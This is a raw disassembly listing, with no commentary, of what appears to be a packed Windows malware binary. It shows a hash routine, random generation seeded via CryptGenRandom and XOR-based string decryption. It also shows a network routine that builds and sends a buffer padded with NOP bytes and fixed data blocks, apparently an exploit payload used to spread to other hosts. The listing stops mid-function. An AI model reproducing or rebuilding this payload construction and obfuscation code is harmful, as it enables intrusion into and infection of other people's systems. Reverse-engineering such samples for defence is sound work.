shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_34]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax+432AFF97h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_18]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-546BDC59h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_3C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-36C5FC7h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_20]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+655B59C3h]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_44]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-70F3336Eh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_28]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-100B83h]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_4C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-7A7BA22Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_30]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax+6FA87E4Fh]
loc_41005C: ; DATA XREF: .packed:off_41A8CC�o
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_14]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-1D31920h]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_38]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax-5CFEBCECh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_1C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax+4E0811A1h]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+var_10]
not eax
mov ecx, [ebp+var_8]
or ecx, eax
mov eax, [ebp+var_C]
xor eax, ecx
add eax, [ebp+var_40]
mov ecx, [ebp+var_4]
lea eax, [ecx+eax-8AC817Eh]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
shl eax, 6
mov ecx, [ebp+var_4]
shr ecx, 1Ah
or eax, ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
add eax, [ebp+var_8]
mov [ebp+var_4], eax
mov eax, [ebp+var_C]
not eax
mov ecx, [ebp+var_4]
or ecx, eax
mov eax, [ebp+var_8]
xor eax, ecx
add eax, [ebp+var_24]
mov ecx, [ebp+var_10]
lea eax, [ecx+eax-42C50DCBh]
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
shl eax, 0Ah
mov ecx, [ebp+var_10]
shr ecx, 16h
or eax, ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
add eax, [ebp+var_4]
mov [ebp+var_10], eax
mov eax, [ebp+var_8]
not eax
mov ecx, [ebp+var_10]
or ecx, eax
mov eax, [ebp+var_4]
xor eax, ecx
add eax, [ebp+var_48]
mov ecx, [ebp+var_C]
lea eax, [ecx+eax+2AD7D2BBh]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
shl eax, 0Fh
mov ecx, [ebp+var_C]
shr ecx, 11h
or eax, ecx
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
add eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_4]
not eax
mov ecx, [ebp+var_C]
or ecx, eax
mov eax, [ebp+var_10]
xor eax, ecx
add eax, [ebp+var_2C]
mov ecx, [ebp+var_8]
lea eax, [ecx+eax-14792C6Fh]
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
shl eax, 15h
mov ecx, [ebp+var_8]
shr ecx, 0Bh
or eax, ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
add eax, [ebp+var_C]
mov [ebp+var_8], eax
mov eax, [ebp+arg_0]
mov eax, [eax]
add eax, [ebp+var_4]
mov ecx, [ebp+arg_0]
mov [ecx], eax
mov eax, [ebp+arg_0]
mov eax, [eax+4]
add eax, [ebp+var_8]
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
mov eax, [ebp+arg_0]
mov eax, [eax+8]
add eax, [ebp+var_C]
mov ecx, [ebp+arg_0]
mov [ecx+8], eax
mov eax, [ebp+arg_0]
mov eax, [eax+0Ch]
add eax, [ebp+var_10]
mov ecx, [ebp+arg_0]
mov [ecx+0Ch], eax
leave
retn
sub_40F3CE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410244 proc near ; CODE XREF: sub_40F3CE+F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
and [ebp+var_4], 0
and [ebp+var_8], 0
jmp short loc_410263
; ---------------------------------------------------------------------------
loc_410253: ; CODE XREF: sub_410244+66�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
mov eax, [ebp+var_8]
add eax, 4
mov [ebp+var_8], eax
loc_410263: ; CODE XREF: sub_410244+D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+arg_8]
jnb short locret_4102AC
mov eax, [ebp+arg_4]
add eax, [ebp+var_8]
movzx eax, byte ptr [eax]
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+1]
shl ecx, 8
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+2]
shl ecx, 10h
or eax, ecx
mov ecx, [ebp+arg_4]
add ecx, [ebp+var_8]
movzx ecx, byte ptr [ecx+3]
shl ecx, 18h
or eax, ecx
mov ecx, [ebp+var_4]
mov edx, [ebp+arg_0]
mov [edx+ecx*4], eax
jmp short loc_410253
; ---------------------------------------------------------------------------
locret_4102AC: ; CODE XREF: sub_410244+25�j
leave
retn
sub_410244 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4102AE proc near ; CODE XREF: .packed:004168D0�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push 0F0000000h
push 1
push 0
push 0
lea eax, [ebp+var_4]
push eax
call dword_417024 ; CryptAcquireContextA
push offset dword_41EB6C
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push offset dword_41EB70
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push offset dword_41EB74
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push offset dword_41EB78
push 4
push [ebp+var_4]
call dword_417020 ; CryptGenRandom
push 0
push [ebp+var_4]
call dword_41701C ; CryptReleaseContext
leave
retn
sub_4102AE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410318 proc near ; CODE XREF: sub_4103F5+6�p
; sub_410422+6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
lock xadd dword_41EB6C, eax
add eax, ebx
lock xadd dword_41EB70, eax
add eax, ecx
lock xadd dword_41EB74, eax
add eax, edx
lock xadd dword_41EB78, eax
add eax, esi
lock xadd dword_41EB6C, eax
add eax, edi
lock xadd dword_41EB70, eax
add eax, ebp
lock xadd dword_41EB74, eax
add eax, esp
lock xadd dword_41EB78, eax
call sub_416B64 ; clock
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lock xadd dword_41EB6C, eax
lock xadd dword_41EB70, eax
lock xadd dword_41EB74, eax
lock xadd dword_41EB78, eax
add ecx, ebx
ror ebx, cl
lock xadd dword_41EB74, ebx
add ecx, ecx
ror ecx, cl
lock xadd dword_41EB70, ecx
add ecx, edx
ror edx, cl
lock xadd dword_41EB6C, edx
rol eax, cl
add ecx, eax
ror ebx, cl
add ecx, ebx
ror ecx, cl
add ecx, 211h
rol edx, cl
add ecx, edx
lock xadd dword_41EB78, edx
lock xadd dword_41EB74, ecx
lock xadd dword_41EB70, ebx
lock xadd dword_41EB6C, eax
pop edi
pop esi
pop ebx
leave
retn
sub_410318 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4103F5 proc near ; CODE XREF: sub_4020C2+10B�p
; sub_4040E8+2D�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EB78, eax
mov ecx, [ebp+arg_4]
sub ecx, [ebp+arg_0]
xor edx, edx
inc ecx
div ecx
mov eax, edx
add eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4103F5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410422 proc near ; CODE XREF: sub_40CF2F:loc_40CFBC�p
; sub_40D871+D3F�p ...
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EB78, eax
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410422 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41043F proc near ; CODE XREF: sub_4055E5+715�p
; sub_4055E5+78B�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EB74, eax
and eax, 0FFFFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_41043F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410461 proc near ; CODE XREF: sub_4104A3+42�p
; sub_4125DF:loc_4126B8�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EB70, eax
and eax, 0FFh
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410461 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410483 proc near ; CODE XREF: sub_4055E5+72B�p
; sub_40D7E5+57�p
push ebp
mov ebp, esp
push ebx
push esi
push edi
call sub_410318
call sub_416B64 ; clock
lock xadd dword_41EB6C, eax
and eax, 1
pop edi
pop esi
pop ebx
pop ebp
retn
sub_410483 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4104A3 proc near ; CODE XREF: sub_40A9CF+D4C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
jnz short loc_4104AF
jmp short locret_4104FF
; ---------------------------------------------------------------------------
loc_4104AF: ; CODE XREF: sub_4104A3+8�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_4104B5: ; CODE XREF: sub_4104A3+34�j
cmp [ebp+arg_4], 3
jbe short loc_4104D9
call sub_410422
mov ecx, [ebp+var_4]
mov [ecx], eax
mov eax, [ebp+var_4]
add eax, 4
mov [ebp+var_4], eax
mov eax, [ebp+arg_4]
sub eax, 4
mov [ebp+arg_4], eax
jmp short loc_4104B5
; ---------------------------------------------------------------------------
loc_4104D9: ; CODE XREF: sub_4104A3+16�j
mov eax, [ebp+var_4]
mov [ebp+arg_0], eax
loc_4104DF: ; CODE XREF: sub_4104A3+5A�j
cmp [ebp+arg_4], 0
jbe short locret_4104FF
call sub_410461
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
dec eax
mov [ebp+arg_4], eax
jmp short loc_4104DF
; ---------------------------------------------------------------------------
locret_4104FF: ; CODE XREF: sub_4104A3+A�j
; sub_4104A3+40�j
leave
retn
sub_4104A3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410501 proc near ; CODE XREF: sub_403260+36�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_4], 0
jnz short loc_410510
xor eax, eax
jmp short locret_41055D
; ---------------------------------------------------------------------------
loc_410510: ; CODE XREF: sub_410501+9�j
cmp [ebp+arg_10], 0
jnz short loc_41051C
mov eax, [ebp+arg_4]
mov [ebp+arg_10], eax
loc_41051C: ; CODE XREF: sub_410501+13�j
push [ebp+arg_10]
push [ebp+arg_4]
call sub_4103F5
pop ecx
pop ecx
mov [ebp+var_8], eax
mov eax, [ebp+var_8]
mov [ebp+var_4], eax
loc_410532: ; CODE XREF: sub_410501+57�j
cmp [ebp+var_4], 0
jbe short loc_41055A
push [ebp+arg_C]
push [ebp+arg_8]
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+arg_0]
mov [ecx], al
mov eax, [ebp+arg_0]
inc eax
mov [ebp+arg_0], eax
mov eax, [ebp+var_4]
dec eax
mov [ebp+var_4], eax
jmp short loc_410532
; ---------------------------------------------------------------------------
loc_41055A: ; CODE XREF: sub_410501+35�j
mov eax, [ebp+var_8]
locret_41055D: ; CODE XREF: sub_410501+D�j
leave
retn
sub_410501 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41055F proc near ; CODE XREF: .packed:004168E1�p
var_58 = byte ptr -58h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 58h
push ebx
push esi
push edi
lea eax, [ebp+var_58]
push eax
call sub_40F11F
pop ecx
push [ebp+arg_4]
push [ebp+arg_0]
lea eax, [ebp+var_58]
push eax
call sub_40F159
add esp, 0Ch
lea eax, [ebp+var_58]
push eax
push offset byte_41EB80
call sub_40F26E
pop ecx
pop ecx
lea esi, byte_41EB80
mov edi, esi
push 10h
pop ecx
loc_41059F: ; CODE XREF: sub_41055F+47�j
lodsb
or eax, 80h
stosb
loop loc_41059F
pop edi
pop esi
pop ebx
leave
retn
sub_41055F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105AD proc near ; CODE XREF: sub_406E8E+C6�p
; sub_406E8E+14A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jle short loc_4105BE
jmp short locret_4105F9
; ---------------------------------------------------------------------------
loc_4105BE: ; CODE XREF: sub_4105AD+D�j
and [ebp+var_4], 0
jmp short loc_4105CB
; ---------------------------------------------------------------------------
loc_4105C4: ; CODE XREF: sub_4105AD+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_4105CB: ; CODE XREF: sub_4105AD+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_4105F9
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_41EB80[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_4105C4
; ---------------------------------------------------------------------------
locret_4105F9: ; CODE XREF: sub_4105AD+F�j
; sub_4105AD+29�j
leave
retn
sub_4105AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4105FB proc near ; CODE XREF: sub_401000+4A�p
; sub_4043E9+1A�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax]
cmp eax, 7Fh
jg short loc_41060C
jmp short locret_410647
; ---------------------------------------------------------------------------
loc_41060C: ; CODE XREF: sub_4105FB+D�j
and [ebp+var_4], 0
jmp short loc_410619
; ---------------------------------------------------------------------------
loc_410612: ; CODE XREF: sub_4105FB+4A�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_410619: ; CODE XREF: sub_4105FB+15�j
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
movsx eax, byte ptr [eax]
test eax, eax
jz short locret_410647
mov eax, [ebp+var_4]
cdq
push 10h
pop ecx
idiv ecx
mov eax, [ebp+arg_0]
add eax, [ebp+var_4]
mov al, [eax]
xor al, byte_41EB80[edx]
mov ecx, [ebp+arg_0]
add ecx, [ebp+var_4]
mov [ecx], al
jmp short loc_410612
; ---------------------------------------------------------------------------
locret_410647: ; CODE XREF: sub_4105FB+F�j
; sub_4105FB+29�j
leave
retn
sub_4105FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410649 proc near ; DATA XREF: .packed:off_41CD6E�o
var_1B78 = dword ptr -1B78h
var_1B74 = byte ptr -1B74h
var_B74 = byte ptr -0B74h
var_B6C = dword ptr -0B6Ch
var_B64 = dword ptr -0B64h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_280 = byte ptr -280h
var_276 = byte ptr -276h
var_272 = byte ptr -272h
var_23A = byte ptr -23Ah
var_236 = byte ptr -236h
var_232 = byte ptr -232h
var_204 = dword ptr -204h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1B78h
call sub_416BC0
push 48h
push offset dword_41A7B0
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410686
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_410686: ; CODE XREF: sub_410649+36�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call dword_417248 ; recv
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+0C2h]
push 200h
lea eax, [ebp+var_200]
push eax
call sub_4125DF
add esp, 20h
mov [ebp+var_370], eax
cmp [ebp+var_370], 0
jnz short loc_4106F0
jmp locret_410B50
; ---------------------------------------------------------------------------
loc_4106F0: ; CODE XREF: sub_410649+A0�j
and [ebp+var_374], 0
jmp short loc_410706
; ---------------------------------------------------------------------------
loc_4106F9: ; CODE XREF: sub_410649+E1�j
mov eax, [ebp+var_374]
inc eax
mov [ebp+var_374], eax
loc_410706: ; CODE XREF: sub_410649+AE�j
cmp [ebp+var_374], 168h
jge short loc_41072C
push 7Ah
push 61h
call sub_4103F5
pop ecx
pop ecx
mov ecx, [ebp+var_374]
mov [ebp+ecx+var_36C], al
jmp short loc_4106F9
; ---------------------------------------------------------------------------
loc_41072C: ; CODE XREF: sub_410649+C7�j
push 0Ah
push offset loc_41A8A0
lea eax, [ebp+var_280]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8F0
lea eax, [ebp+var_276]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push offset loc_41A8E8
lea eax, [ebp+var_272]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 2
push offset loc_41A8EC
lea eax, [ebp+var_23A]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 4
push (offset loc_41A8E3+1)
lea eax, [ebp+var_236]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push 0Bh
push offset loc_41A894
lea eax, [ebp+var_232]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, 3E6h
sub eax, [ebp+var_370]
mov [ebp+var_204], eax
and [ebp+var_1B78], 0
push 18h
push offset dword_41A7FC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 18h
mov [ebp+var_1B78], eax
push 44h
push offset dword_41A818
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 44h
mov [ebp+var_1B78], eax
push 20h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 20h
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8AC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8E0
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset dword_41A8D8
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8DC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 58h
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 58h
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8B4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push 8
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 8
mov [ebp+var_1B78], eax
push 4
push offset loc_41A8BC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 4
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 4
mov [ebp+var_1B78], eax
push 6
push offset loc_41A8C4
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 6
mov [ebp+var_1B78], eax
push [ebp+var_204]
push 0FFFFFF90h
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_204]
mov [ebp+var_1B78], eax
push [ebp+var_370]
lea eax, [ebp+var_200]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, [ebp+var_370]
mov [ebp+var_1B78], eax
push 168h
lea eax, [ebp+var_36C]
push eax
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 168h
mov [ebp+var_1B78], eax
push 0Ah
push offset off_41A8CC
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 0Ah
mov [ebp+var_1B78], eax
push 32h
push offset dword_41A860
mov eax, [ebp+var_1B78]
lea eax, [ebp+eax+var_B74]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_1B78]
add eax, 32h
mov [ebp+var_1B78], eax
mov eax, [ebp+var_1B78]
mov [ebp+var_B6C], eax
mov eax, [ebp+var_1B78]
sub eax, 18h
mov [ebp+var_B64], eax
push [ebp+var_1B78]
lea eax, [ebp+var_B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_4053BF
add esp, 0Ch
push 0EA60h
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call sub_40546E
pop ecx
pop ecx
test eax, eax
jnz short loc_410B36
jmp short locret_410B50
; ---------------------------------------------------------------------------
loc_410B36: ; CODE XREF: sub_410649+4E9�j
push 0
push 1000h
lea eax, [ebp+var_1B74]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax+3Eh]
call dword_417248 ; recv
locret_410B50: ; CODE XREF: sub_410649+38�j
; sub_410649+A2�j ...
leave
retn
sub_410649 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_410B52 proc near ; DATA XREF: .packed:0041CDA8�o
var_104C = byte ptr -104Ch
var_FC6 = byte ptr -0FC6h
var_BDE = byte ptr -0BDEh
var_B9E = byte ptr -0B9Eh
var_B7C = dword ptr -0B7Ch
var_B78 = byte ptr -0B78h
var_AF2 = byte ptr -0AF2h
var_88E = byte ptr -88Eh
var_882 = byte ptr -882h
var_85E = byte ptr -85Eh
var_852 = byte ptr -852h
var_82E = byte ptr -82Eh
var_80C = byte ptr -80Ch
var_7CC = byte ptr -7CCh
var_7C8 = byte ptr -7C8h
var_20C = dword ptr -20Ch
var_208 = byte ptr -208h
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 104Ch
call sub_416BC0
push 7
push offset dword_41A7A8
mov eax, [ebp+arg_0]
push dword ptr [eax+2Ah]
mov eax, [ebp+arg_0]
add eax, 146h
push eax
mov eax, [ebp+arg_0]
add eax, 0C6h
push eax
